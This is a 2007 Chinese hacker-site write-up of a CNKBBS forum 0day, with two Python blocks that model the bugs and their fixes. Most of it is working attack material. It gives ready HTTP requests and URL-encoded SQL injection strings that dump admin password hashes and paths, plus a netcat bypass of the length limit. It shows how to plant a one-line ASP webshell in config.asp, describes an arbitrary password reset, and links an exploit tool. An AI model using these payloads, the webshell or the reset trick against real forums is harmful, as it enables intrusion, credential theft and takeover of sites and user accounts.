cnkbbs 0day analysis
Author: YesHack.… Source: YesHack.Com Updated: 2007-10-25 8:06:23
[Huaxia Hacker Alliance Network Elite Group] First, let's look at the source:
forgetpwd.asp (CNKBBS2007 v5.3)
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!--#include file="opendb.asp" -->
<!--#include file="md5.asp" -->
<%
Conn.execute("delete from Cnk_Record where riqi<>'"&date()&"'")
Dim action,chkusername,chkpwdanswer,chkpwd,chkpassword,pwd_question,pwd_answer
action=Request("action")
chkusername=Trim(Request.Form("chkusername"))     
chkpwdanswer=Trim(Request.Form("chkpwdanswer")) 
chkpassword=trim(request("password"))
pwd_question=Trim(Request.Form("pwd_question"))
pwd_answer=Trim(Request.Form("pwd_answer"))

thistitle="用户找回密码"
Call Showhead()
%>
<div class="CnkBox">
<div class="CnkBoxTitle"><strong>找回密码</strong></div>
<div id="list"> <br />
  <% Select Case action
Case "" %>
  <script>
<!--
function signin() {
validity=true;

if (!check_empty(document.fgform.chkusername.value) || (document.fgform.chkusername.value=="用户名"))
{ validity=false;
alert('请输入用户名!');
document.fgform.chkusername.focus();
return validity; }
return validity;
}
//-->
</script>
  <form name="fgform" method="post" action="" onSubmit="return signin();">
    <ul>
    <li class="t1">输入您的登录名:</li>
    <li class="t2">
      <input name="chkusername" type="text" class="input" id="chkusername" onFocus="if (this.value=='用户名') this.value='';" value="用户名" maxlength="20">
    </li>
    </ul>
    <br />
    <br />
    <ul>
    <li class="t1">
      <input name="action" type="hidden" id="action" value="1">
    </li>
    <li class="t2">
      <input type="button" name="Submit22" value="<<上一步" class="button" onClick="history.go(-1)">
      <input type="submit" name="Submit2" value="下一步>>" class="button">
    </li>
    </ul>
    <br />
    <br />
    <br />
  </form>
  <% Case "1"
  rs.open "select question from cnk_users where username='"&chkusername&"'",conn,1,3
  if rs.recordcount=0 then
  Call alertmsg("不存在的用户名!")
    rs.close
  else
%>
Note these two lines:
chkusername=Trim(Request.Form("chkusername"))
rs.open "select question from cnk_users where username='"&chkusername&"'",conn,1,3
It is plain to see that chkusername is taken straight from the form and concatenated into the SQL without any filtering. That is the injection vulnerability.
There is one small obstacle, though, in this line:
<input name="chkusername" type="text" class="input" id="chkusername" onFocus="if (this.value=='用户名') this.value='';" value="用户名" maxlength="20">
It limits the username input to 20 characters, and our injection string is certainly longer than 20. Getting around it is simple, because the limit lives only in the browser: submit the request directly with NC (netcat) and it is gone.
OK, now set up IIS locally and start testing. Click "forgot password" on the home page to reach the password recovery page, enter anything, and capture the request with WSE.
The request looks like this:
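As an added illustration (not code from the original post or from CNKBBS), the same lookup is modelled in Python with an in-memory SQLite table standing in for cnk_users: the concatenated form reproduces the page's bug, while the fixed form enforces the 20-character limit on the server and binds chkusername as a parameter. The table contents, PAYLOAD and the function names are constructed for this example.

```python
import hashlib
import sqlite3

PAYLOAD = "tox0' and 1=2 union select UserPassword from Cnk_Users where UserName='admin"  # the page's own input

def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the cnk_users columns the page's query touches.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table cnk_users (username text primary key, userpassword text, question text)")
    conn.execute("insert into cnk_users values (?, ?, ?)", ("admin", md5hex("s3cret"), "pet name?"))
    return conn

def lookup_question_vulnerable(conn: sqlite3.Connection, chkusername: str):
    # Same construction as the page's rs.open line: the form value is spliced into the SQL text,
    # so a quote in it ends the string literal and whatever follows is executed as SQL.
    sql = "select question from cnk_users where username='" + chkusername + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_question_fixed(conn: sqlite3.Connection, chkusername: str):
    # Enforce on the server what maxlength=20 only suggests to the browser (netcat skips it),
    # then bind the value as a parameter so it can only ever be compared as a username.
    chkusername = chkusername.strip()
    if not 1 <= len(chkusername) <= 20:
        return None
    row = conn.execute("select question from cnk_users where username=?", (chkusername,)).fetchone()
    return row[0] if row else None
```

The short input `x' or '1'='1` passes the length check and shows that the parameter binding, not the length limit, is what actually closes the hole.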
POST /forgetpwd.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://127.0.0.1/forgetpwd.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TencentTraveler )
Host: 127.0.0.1
Content-Length: 59
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:ASPSESSIONIDSSAQARQC=KLHPDKCDIEBGFDCHDIOMNNIH;cnkbbs=onlineid=12700160

chkusername=12312&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E

Now construct the injection string.
The query is "select question from cnk_users where username='"&chkusername&"'". When our chkusername value is tox0' and 1=2 union select UserPassword from Cnk_Users where UserName='admin, the statement that actually runs becomes: select question from cnk_users where username='tox0' and 1=2 union select UserPassword from Cnk_Users where UserName='admin'
That dumps the password hash. The injection can of course be built more flexibly: the where condition need not be UserName='admin'; it could be UserId=1, or AdminRight= 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20. Just remember to close the trailing single quote.
Modify the request accordingly:
POST /forgetpwd.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://127.0.0.1/forgetpwd.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TencentTraveler )
Host: 127.0.0.1
Content-Length: 138
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:ASPSESSIONIDSSAQARQC=KLHPDKCDIEBGFDCHDIOMNNIH;cnkbbs=onlineid=12700160

chkusername=tox0%27+and+1%3D2+union+select+userpassword+from+Cnk_Users+where+UserName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E

Submit it with nc. Success: the front-end administrator's password hash is dumped in the password-question field.
Because the Zhongwangjing forum (中网景论坛) keeps front-end and back-end administrators in different tables, the two passwords may differ, so the back-end hash has to be dumped as well. The back-end administrator table is Cnk_Admin, with columns AdminName, AdminID, AdminPassword and AdminRight; an administrator holding every permission has an AdminRight value of 1, 2, 3, 4, 5, 10, 11, 12, 14, 15, 16, 20, 21, 22, 23, 24, 25, 26, 27, 28, 30, 34, 31, 32, 33, 40, 41, 42, 43, 44, 50, 51, 60, 61, 70, 71. I won't go into how to build that injection here.
OK, assuming everything went smoothly and the hash has been cracked (if it cannot be cracked, there is another way below), log into the back end; the goal is a webshell.
The approach is to plant a one-line shell, and the place to plant it is config.asp. Change the forum name to: original name"%><%execute request("value")%><%rem. For example, if the original name is tox0, change it to tox0"%><%execute request("value")%><%rem, connect with a one-line shell client and upload the webshell. Once the upload succeeds, change the name back. What you do after getting the shell is up to you...

Here are a few injection strings; adapt them as you like:
chkusername=tox0%27+and+1%3D2+union+select+adminpath+from+Cnk_Setup+where+%271%27%3D%271&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E
(Content-Length: 130, dumps the back-end admin path)

chkusername=tox0%27+and+1%3D2+union+select+userpassword+from+Cnk_Users+where+UserName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E (Content-Length: 138, dumps the front-end password hash)

chkusername=tox0%27+and+1%3D2+union+select+adminpassword+from+Cnk_Admin+where+AdminName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E (Content-Length: 140, dumps the back-end password hash)

Now for the second vulnerability. It is again in forgetpwd.asp, and it allows changing any user's password, so it is the fallback when the MD5 cannot be cracked. Look at the source again:
  <form name="form1" method="post" action="" onSubmit="return signin();">
    <ul>
    <li class="t1">设置新密码:</li>
    <li class="t2"><input name="password" type="password" class="input" id="password" maxlength="20">
      6-20字符</li>
    </ul>
    <ul>
    <li class="t1">确认新密码:</li>
    <li class="t2">
      <input name="password2" type="password" class="input" id="password2" maxlength="20">
      6-20字符</li>
    </ul>
    <ul>
    <li class="t1">设置新问题:</li>
    <li class="t2">
      <input name="pwd_question" type="text" class="input" id="pwd_question" maxlength="20">
      不改请留空</li>
    </ul>
    <ul>
    <li class="t1">设置新答案:</li>
    <li class="t2">
      <input name="pwd_answer" type="text" class="input" id="pwd_answer" maxlength="20">
      不改请留空</li>
    </ul>
    <br />
    <br />
    <ul>
    <li class="t1">
      <input name="action" type="hidden" id="action" value="3">
      <input name="chkusername" type="hidden" id="chkusername" value="<%= chkusername %>">
    </li>
    <li class="t2">
      <input type="button" name="Submit22" value="<<上一步" class="button" onClick="history.go(-1)">
      <input type="submit" name="Submit" value="下一步>>" class="button">
    </li>
    </ul>
  </form>
  <% End If %>
<% Select Case action
Case "3"
rs.open "select UserPassword,question,answer from cnk_users where username='"&chkusername&"'",conn,1,3
rs("UserPassword")=MD5(chkpassword)
if pwd_question<>"" then rs("question")=pwd_question
if pwd_answer<>"" then rs("answer")=MD5(pwd_answer)
rs.update
rs.Close
set rs=nothing
%>
Note these two lines:
<input name="chkusername" type="hidden" id="chkusername" value="<%= chkusername %>">
rs.open "select UserPassword,question,answer from cnk_users where username='"&chkusername&"'",conn,1,3
The first shows that the password-change page carries a hidden field named chkusername whose value is the username entered in the earlier step. The second changes the password of whichever user's username equals that chkusername value, and, as noted above, chkusername is simply Request.Form("chkusername").
forgetpwd.asp never checks whether chkusername is the current user, nor whether the request came from its own form rather than from outside. So by crafting a request with a different chkusername value, anyone can change any user's password (front-end passwords only).
Tool download: http://tox0.88y.net/SOFT/cnkbbs%200day.exe
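As an added illustration of the fix (a Python model, not code from the original post or from CNKBBS), the Case "3" update is shown trusting the hidden field, beside a version that takes the target account from a server-side session populated by the secret-answer check. The SQL is parameterised throughout so that only the trust-in-hidden-field bug is in view; the accounts, the session dict and the function names are constructed for this example.

```python
import hashlib
import sqlite3
def md5hex(s: str) -> str:
    # MD5 only because the page's application stores MD5; it is not a suitable password hash.
    return hashlib.md5(s.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for cnk_users with two accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table cnk_users (username text primary key, userpassword text, answer text)")
    conn.executemany("insert into cnk_users values (?, ?, ?)",
                     [("admin", md5hex("s3cret"), md5hex("rex")), ("tox0", md5hex("pass"), md5hex("cat"))])
    return conn

def password_hash(conn, username: str) -> str:
    return conn.execute("select userpassword from cnk_users where username=?", (username,)).fetchone()[0]

def reset_vulnerable(conn, form: dict) -> str:
    # The page's Case "3": the account changed is whatever the client-controlled hidden field says.
    conn.execute("update cnk_users set userpassword=? where username=?",
                 (md5hex(form["password"]), form["chkusername"]))
    return form["chkusername"]

def verify_answer(conn, session: dict, form: dict) -> bool:
    # The step that must precede Case "3": check the secret answer, and remember the verified
    # account in the server-side session instead of echoing it back into a hidden field.
    row = conn.execute("select answer from cnk_users where username=?", (form["chkusername"],)).fetchone()
    if row and row[0] == md5hex(form["chkpwdanswer"]):
        session["reset_user"] = form["chkusername"]
        return True
    return False

def reset_fixed(conn, session: dict, form: dict):
    # Only the account verified in this session may be changed; form["chkusername"] is ignored.
    target = session.get("reset_user")
    pwd = form["password"]
    if target is None or not 6 <= len(pwd) <= 20 or pwd != form["password2"]:
        return None
    conn.execute("update cnk_users set userpassword=? where username=?", (md5hex(pwd), target))
    session.pop("reset_user")  # one verification allows one reset
    return target

def demo():
    # Constructed walk-through: tox0 proves its own answer, then submits chkusername=admin at step 3.
    conn, session = make_db(), {}
    before = password_hash(conn, "admin")
    verify_answer(conn, session, {"chkusername": "tox0", "chkpwdanswer": "cat"})
    changed = reset_fixed(conn, session, {"chkusername": "admin", "password": "newpass1", "password2": "newpass1"})
    return changed, password_hash(conn, "admin") == before, password_hash(conn, "tox0") == md5hex("newpass1")
```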



PS: While reading the source I also noticed a problem in the upload code: the upload path can be modified, much like the old Dvbbs 6.0 upload vulnerability. But I tested it locally N times without success and don't know why. Anyone interested is welcome to dig into it.
Entered by: YesHack    Editor in charge: YesHack